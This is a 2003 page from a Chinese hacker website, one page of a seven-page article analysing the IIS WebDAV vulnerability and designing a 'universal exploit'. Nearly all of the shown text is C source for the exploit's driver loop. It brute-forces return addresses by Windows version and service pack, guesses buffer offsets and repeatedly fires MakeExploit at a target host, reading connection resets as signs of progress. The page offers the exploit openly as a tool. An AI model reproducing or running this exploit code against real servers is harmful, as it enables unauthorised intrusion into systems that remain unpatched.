 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| WebDav漏洞简单分析及通用exploit设计 | |||||
作者:eyas 文章来源:CnXHacker.Net 点击数: 更新时间:2003-5-18  |
|||||
|
return; } else { iStartOffset = iOffset; iEndOffset = iOffset; } } if((iOsType > 2) || (iSP > 3)) { usage(); return; } //brute force if((iOsType == -1) && (iSP == -1)) { memcpy(iRetAddrList, g_iRetAddrList, sizeof(iRetAddrList)); iRetAddrNum = sizeof(iRetAddrList)/sizeof(int); } if((iOsType == -1) && (iSP != -1)) { for(i=0;i<3;i++) iRetAddrList[iRetAddrNum++] = g_iRetAddrList[i][iSP]; } if((iOsType != -1) && (iSP == -1)) { for(i=3;i>=0;i--) iRetAddrList[iRetAddrNum++] = g_iRetAddrList[iOsType][i]; } if((iOsType != -1) && (iSP != -1)) iRetAddrList[iRetAddrNum++] = g_iRetAddrList[iOsType][iSP]; printf( "IP\t\t:%s\n" "Host\t\t:%s\n" "Port\t\t:%d\n" "Offset\t\t:%d-%d\n" "iOffset\t\t:%d\n" "OsType\t\t:%d\n" "SP\t\t:%d\n" "RetAddrNum\t:%d\n",ip,host,iPort,iStartOffset, iEndOffset, iOffset,iOsType, iSP,iRetAddrNum); for(i=0;i<iRetAddrNum;i++) printf("%.8X ", iRetAddrList[i]); printf("\nStart exploit[y/n]:"); if (getchar() == 'n') return; k=0; for(i=iStartOffset;i<=iEndOffset;i++) { //如果是猜测offset,先试23 if(i==StartOffset) i=DefaultOffset; else if((i==DefaultOffset) && (iOffset==0)) continue; printf("try offset:%d\tuse retaddr:0x%.8X\n", i, iRetAddrList[k]); iRet = MakeExploit(iRetAddrList[k], i, host, ip, iPort); switch(iRet) { case ERROR_NOT_IIS: case ERROR_METHOD_NOT_SUPORT: case ERROR_OTHER: exit(1); break; case ERROR_CONNECT_FALIED: printf("can't connect to %s:%d", ip, iPort); //第一次就连接不上,或超出最大重试次数 if( (i==DefaultOffset) || (g_iConnectError > MaxTry) ) { printf(", exit.\n"); exit(1); } printf(", wait for try again.\n"); Sleep(5000); //same offset、retaddr try again i--; break; case ERROR_CONNECT_RESET: iCorrectOffset = i; break; case ERROR_RECV_TIMEOUT: printf("recv buff timeout.Maybe success?\n"); exit(1); break; } if(i==DefaultOffset) i=6; if(iCorrectOffset) break; //getchar(); } if(iCorrectOffset) printf( "-=-= we got correct offset:%d -=-=\n" "-=-= but retaddr %.8X error -=-=\n", iCorrectOffset, iRetAddrList[k]); else return; if(iRetAddrNum<2) return; //尝试其他retaddr for(k=1;k<iRetAddrNum;k++) { Sleep(5000); printf("use offset:%d\ttry retaddr:0x%.8X\n", iCorrectOffset, iRetAddrList[k]); iRet = MakeExploit(iRetAddrList[k], iCorrectOffset, host, ip, 80); switch(iRet) { case ERROR_CONNECT_FALIED: printf("can't connect to %s:%d", ip, iPort); if(g_iConnectError > MaxTry) { printf(", eixt.\n"); exit(1); } else printf(", wait for try again.\n"); k--; break; case ERROR_CONNECT_RESET: 上一页 [1] [2] [3] [4] [5] [6] [7] 下一页 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 通过建立安全模型保障Web数据 US CERT:谷歌eBay雅虎网站均 webshell下分离大文件资料 经典Webshell提权集合九招 四成Facebook用户轻易泄露身 FaceBook源代码泄漏 机器数量庞大 Google成WEB服 Web2.0带来营销领域深刻变化 安全专家:Web 2.0站点的coo Web安全性问题的层次关系 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
